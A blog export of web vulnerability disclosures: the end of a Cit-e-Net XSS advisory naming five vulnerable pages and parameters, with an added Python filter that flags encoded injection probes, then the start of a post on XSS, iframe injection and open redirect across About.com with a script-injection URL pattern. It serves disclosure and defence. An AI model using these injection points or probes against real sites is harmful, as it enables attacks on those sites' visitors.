<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.1)</strong> The first programming code flaw occurs at "/eventscalendar/index.cfm?" page with "&DID" parameter in HTTP GET.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.2)</strong> The second programming code flaw occurs at "/search/index.cfm?" page with "&keyword" parameter in HTTP POST.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.3)</strong> The third programming code flaw occurs at "/news/index.cfm" page with "&jump2" and "&DID" parameters in HTTP GET.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.4)</strong> The fourth programming code flaw occurs at "eventscalendar?" page with "&TPID" parameter in HTTP GET.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.5)</strong> The fifth programming code flaw occurs at "/meetings/index.cfm?" page with "&DID" parameter in HTTP GET.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /></span></div>
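<div>
<span style="font-family: Arial, Helvetica, sans-serif;">One way an operator could screen requests to the five locations in (2.1)-(2.5) is sketched below; it is an added example, not code from the advisory or from Cit-e-Net. The path fragments and parameter names come from the list above; treating DID and TPID as integer ids (as in the demo URL's TPID=17), treating keyword and jump2 as free text, and all sample requests are assumptions constructed for illustration.</span></div>

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Path fragment -> {parameter name (lower case): expected kind}.
# Fragments and names are taken from sections 2.1-2.5 of the advisory.
# The kinds are ASSUMPTIONS: ids are integers, the rest is free text.
RULES = {
    "/eventscalendar": {"did": "int", "tpid": "int"},       # 2.1, 2.4
    "/search/index.cfm": {"keyword": "text"},               # 2.2 (POST)
    "/news/index.cfm": {"jump2": "text", "did": "int"},     # 2.3
    "/meetings/index.cfm": {"did": "int"},                  # 2.5
}

INT_RE = re.compile(r"\d{1,10}")
META_RE = re.compile(r"[<>\"'`]")  # characters that can break out of HTML


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %253C is seen as '<'."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_request(method, target, body=""):
    """Return [(param, reason)] for suspicious values on listed endpoints."""
    parts = urlsplit(target)
    path = parts.path.lower()
    rules = {}
    for fragment, params in RULES.items():
        if fragment in path:  # the app may be mounted under a prefix
            rules.update(params)
    if not rules:
        return []

    pairs = parse_qsl(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        # Form fields arrive in the body and never show up in access logs.
        pairs += parse_qsl(body, keep_blank_values=True)

    findings = []
    for name, raw in pairs:
        kind = rules.get(name.lower())  # parameter names are matched case-insensitively
        if kind is None or raw == "":
            continue
        value = fully_decode(raw).strip()
        if kind == "int" and not INT_RE.fullmatch(value):
            findings.append((name, "expected integer id"))
        elif kind == "text" and META_RE.search(value):
            findings.append((name, "HTML metacharacter in text field"))
    return findings


# Constructed sample requests (not taken from any real log).
SAMPLES = [
    ("GET", "/eventscalendar/index.cfm?DID=12", ""),
    ("GET", "/Cit-e-Access/meetings/index.cfm?did=7%22%3E%3Cb%3E", ""),
    ("POST", "/search/index.cfm", "keyword=trash+pickup+schedule"),
    ("POST", "/search/index.cfm", "keyword=%253Cb%253Ehello"),
    ("GET", "/news/index.cfm?jump2=3&DID=5", ""),
    ("GET", "/contact.cfm?DID=%3Cb%3E", ""),
]


def triage(samples=SAMPLES):
    """Return only the requests that produced at least one finding."""
    flagged = []
    for method, target, body in samples:
        hits = check_request(method, target, body)
        if hits:
            flagged.append((method, target, hits))
    return flagged


if __name__ == "__main__":
    for method, target, hits in triage():
        print(method, target, hits)
```

<div>
<span style="font-family: Arial, Helvetica, sans-serif;">A check like this only narrows the exposure at the edge; the underlying fix is still output encoding of these parameters in the pages that reflect them.</span></div>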
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><br /></strong><strong>(3) Solutions:</strong></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">A message was left for the vendor. No response.</span></div>
<div>
<a data-mce-href="http://www.cit-e.net/contact.cfm" href="http://www.cit-e.net/contact.cfm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.cit-e.net/contact.<wbr></wbr>cfm</span></a></div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><br /><br /></span></div>
<div>
</div>
<div>
<strong><span style="font-family: Arial, Helvetica, sans-serif;">References:</span></strong><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2015/Feb/48">http://seclists.org/fulldisclosure/2015/Feb/48</a></span><br />
<a href="http://lists.openwall.net/full-disclosure/2015/02/13/2"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/02/13/2</span></a><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1587"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1587</span></a></div>
<div>
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01683.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01683.html</span></a></div>
<div>
<a href="https://computerpitch.wordpress.com/2015/06/07/cve-2014-8753/" style="background-color: white;" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://computerpitch.<wbr></wbr>wordpress.com/2015/06/07/cve-<wbr></wbr>2014-8753/</span></a><br />
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://webtechhut.blogspot.com/2015/06/cve-2014-8753.html" target="_blank">http://webtechhut.blogspot.<wbr></wbr>com/2015/06/cve-2014-8753.html</a></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/websecuritiesnews/posts/804176613035844">https://www.facebook.com/websecuritiesnews/posts/804176613035844</a></span></div>
<div style="background-color: white;">
<div>
<a href="https://twitter.com/tetraphibious/status/607381197077946368" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/<wbr></wbr>tetraphibious/status/<wbr></wbr>607381197077946368</span></a></div>
<div>
<a href="http://biboying.lofter.com/post/1cc9f4f5_7356826" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://biboying.lofter.com/<wbr></wbr>post/1cc9f4f5_7356826</span></a></div>
<div>
<a href="http://shellmantis.tumblr.com/post/120903342496/securitypost-cve-2014-8753-cit-e-net-multiple" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://shellmantis.tumblr.com/<wbr></wbr>post/120903342496/<wbr></wbr>securitypost-cve-2014-8753</span></a></div>
</div>
<div style="background-color: white;">
<a href="http://itprompt.blogspot.com/2015/06/cve-2014-8753.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://itprompt.blogspot.com/<wbr></wbr>2015/06/cve-2014-8753.html</span></a></div>
<div style="background-color: white;">
<a href="http://whitehatpost.blog.163.com/blog/static/24223205420155710559404/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatpost.blog.163.<wbr></wbr>com/blog/static/<wbr></wbr>24223205420155710559404/</span></a></div>
<div style="background-color: white;">
<a href="https://plus.google.com/u/0/113115469311022848114/posts/FomMK9BGGx2" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://plus.google.com/u/0/<wbr></wbr>113115469311022848114/posts/<wbr></wbr>FomMK9BGGx2</span></a></div>
<div style="background-color: white;">
<a href="https://www.facebook.com/pcwebsecurities/posts/702290949916825"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/pcwebsecurities/posts/702290949916825</span></a></div>
<div style="background-color: white;">
<a href="http://securitypost.tumblr.com/post/120903225352/cve-2014-8753-cit-e-net-multiple-xss" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securitypost.tumblr.<wbr></wbr>com/post/120903225352/cve-<wbr></wbr>2014-8753-cit-e-net</span></a></div>
<div style="background-color: white;">
<a href="http://webtech.lofter.com/post/1cd3e0d3_7355910" style="background-color: transparent;" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webtech.lofter.com/<wbr></wbr>post/1cd3e0d3_7355910</span></a></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a data-mce-href="http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/" href="http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/">http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/</a></span><br />
<a data-mce-href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-8753/" href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-8753/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/cve-2014-8753/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: start;">
</div>
<br />
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-4729462396683753782015-06-06T04:21:00.000-07:002015-06-06T04:21:30.086-07:00About Group (about.com) All Topics (At least 99.88% links) Vulnerable to XSS & Iframe Injection Security Attacks, About.com Open Redirect Web Security Vulnerabilities<div>
<div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">About Group (about.com) All Topics (At least 99.88% links) Vulnerable to XSS & Iframe Injection Security Attacks, About.com Open Redirect Security Vulnerabilities</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">All About.com "topic sites" are vulnerable to XSS (Cross-Site Scripting) and Iframe Injection (Cross Frame Scripting) attacks. This means all sub-domains of about.com are affected. Using a self-written program, 94357 links were tested. Only 118 of them do not belong to the topic (Metasite) links. Some about.com main pages are vulnerable to XSS attacks as well. This means no more than 0.125% of the links are unaffected; at least 99.875% of About Group's links are vulnerable to XSS and Iframe Injection attacks. Because of how about.com is structured, the main domain acts as little more than a cover, so very few links belong to it.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The About.com main page's search field is also vulnerable to XSS attacks. This means all domains related to about.com are vulnerable to XSS attacks.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The Iframe Injection vulnerabilities can also be used to carry out DDoS (Distributed Denial-of-Service) attacks against other websites.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Here is one example, reported by others, of DDoS based on Iframe Injection attacks.</span><br />
<a href="http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html" style="line-height: 25.5px;" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.incapsula.com/blog/<wbr></wbr>world-largest-site-xss-ddos-<wbr></wbr>zombies.html</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Finally, some "Open Redirect" vulnerabilities related to about.com are introduced. There may be a large number of other Open Redirect vulnerabilities that were not detected. Since About.com is trusted by some other websites, those vulnerabilities can be used to perform "Covert Redirect" against these websites.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Disclosure:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">These vulnerabilities were reported to About on Sunday, Oct 19, 2014. No one replied. To date, they remain unpatched.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-JBGSid9pxUc/VM92x82x65I/AAAAAAAAAow/zGACIsbNAcU/s1600/about_quesion_security_xss1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="181" src="http://4.bp.blogspot.com/-JBGSid9pxUc/VM92x82x65I/AAAAAAAAAow/zGACIsbNAcU/s400/about_quesion_security_xss1.jpg" width="400" /></span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Discoverer:</span></b></div>
</div>
<div>
</div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/562252555149791233">@Justqdjing</a>)</span></div>
<div>
<a href="http://www.tetraph.com/wangjing"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/<wbr></wbr>wangjing</span></a><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) Some Basic Background</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.1) Domain Description:</span></b></div>
<div>
<div>
<a href="http://www.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/</span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.alexa.com/siteinfo/about.com">http://www.alexa.com/siteinfo/about.com</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"For March 2014, 61,428,000 unique visitors were registered by comScore for About.com, making it the 16th-most-visited online property for that month." (The New York Times)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"About.com, also known as The About Group (formerly About Inc.), is an Internet-based network of content that publishes articles and videos about various subjects on its "topic sites," of which there are nearly 1,000. The website competes with other online resource sites and encyclopedias, including those of the Wikimedia Foundation, and, for March 2014, 61,428,000 unique visitors were registered by comScore for About.com, making it the 16th-most-visited online property for that month. As of August 2012, About.com is the property of IAC, owner of Ask.com and numerous other online brands, and its revenue is generated by advertising." (Wikipedia)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"As of May 2013, About.com was receiving about 84 million unique monthly visitors." (TechCrunch. AOL Inc.)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"According to About's online media kit, nearly 1,000 "Experts" (freelance writers) contribute to the site by writing on various topics, including healthcare and travel." (About.com)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.2) Topics Related to About.com</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"The Revolutionary About.com Directory and Community Metasite. Hundreds of real live passionate Guides covering Arts, Entertainment, Business, Industry, Science, Technology, Culture, Health, Fitness, Games,Travel, News, Careers, Jobs, Sports, Recreation, Parenting, Kids, Teens, Moms, Education, Computers, Hobbies and Local Information." (<a href="http://azlist.about.com/" target="_blank">azlist.about.com</a>)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">About.com - Sites A to Z </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Number of Topics</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">A: 66</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">B: 61</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">C: 118</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">D: 49</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">E: 33</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">F: 57</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">G: 39</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">H: 48</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">I: 32</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">J: 15</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">K: 13</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">L: 36</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">M: 70</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">N: 26</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">O: 23</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">P: 91</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Q: 4</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">R: 32</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">S: 104</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">T: 47</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">U: 12</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">V: 9</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">W: 43</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">X: 1</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Y: 4</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Z: 1</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">SUM: 1039</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Reference:</span></div>
<div>
<a href="http://azlist.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">azlist.about.com/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">In fact, these are not all of the topics on about.com. Some topics are not listed there, such as:</span></div>
<div>
<a href="http://specialchildren.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://specialchildren.about.<wbr></wbr>com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">So, there are more than 1000 topics related to about.com.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.3) Result of Exploiting XSS Attacks</span></b><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><span style="font-family: Arial, Helvetica, sans-serif;">XSS may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">According to Acunetix, exploited XSS is commonly used to achieve the following malicious results:</span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> "Identity theft</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Accessing sensitive or restricted information</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Gaining free access to otherwise paid for content</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Spying on user’s web browsing habits</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Altering browser functionality</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Public defamation of an individual or corporation</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Web application defacement</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Denial of Service attacks (DOS)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">" (Acunetix)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.4) Basics of Iframe Injection (Cross-frame-Scripting) Vulnerabilities</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"In an XFS (Cross-frame-Scripting) attack, the attacker exploits a specific cross-frame-scripting bug in a web browser to access private data on a third-party website. The attacker induces the browser user to navigate to a web page the attacker controls; the attacker's page loads a third-party page in an HTML frame; and then JavaScript executing in the attacker's page steals data from the third-party page." (OWASP)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"XFS also sometimes is used to describe an XSS attack which uses an HTML frame in the attack. For example, an attacker might exploit a Cross Site Scripting Flaw to inject a frame into a third-party web page; or an attacker might create a page which uses a frame to load a third-party page with an XSS flaw." (OWASP)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.5) Basics of Open Redirect (Dest Redirect Privilege Escalation) Vulnerabilities</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it." (OWASP)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Open redirect is listed in the OWASP Top 10. The general consensus is that "avoiding such flaws is extremely important, as they are a favorite target of phishers trying to gain the user's trust."</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Several similar 0-day vulnerabilities in other products have been found by other bug hunters before. CNN has patched some of them. "The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" Many web security issues of the following kinds have been published there: Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, Unvalidated Redirects and Forwards. It also publishes suggestions, advisories and solution details related to XSS and URL Redirection vulnerabilities, as well as cyber intelligence recommendations.</span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) About Group About.com All Topics (At least 99.88% links) Vulnerable to XSS (Cross-Site Scripting) Security Attacks</span></b></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></div>
<div>
<a href="http://www.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">A method was found to attack users of About.com using XSS attacks.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">All links under the topics of about.com can be used for this attack.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Append "/lr/" to any About.com subdomain, then append either "any code + script" or the "script" code directly. The structure is "<a href="http://subdomain.about.com/lr/*/script_code/*">http://subdomain.about.com/<wbr></wbr>lr/*/script_code/*</a>".</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability can be attacked without user login. Tests were performed on Mozilla Firefox (26.0) in Ubuntu (14.04) and Microsoft IE (9.0.15) in Windows 7.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-SLnx29JIMAA/VM97bOAmq6I/AAAAAAAAApg/ieERY3imK64/s1600/about_all_xss_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="251" src="http://4.bp.blogspot.com/-SLnx29JIMAA/VM97bOAmq6I/AAAAAAAAApg/ieERY3imK64/s400/about_all_xss_1.png" width="400" /></span></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-MBV2Ka-nNrk/VM97bOIghQI/AAAAAAAAApQ/gI4iuvA02EY/s1600/about_all_xss_2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="251" src="http://3.bp.blogspot.com/-MBV2Ka-nNrk/VM97bOIghQI/AAAAAAAAApQ/gI4iuvA02EY/s400/about_all_xss_2.png" width="400" /></span></a></div>
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
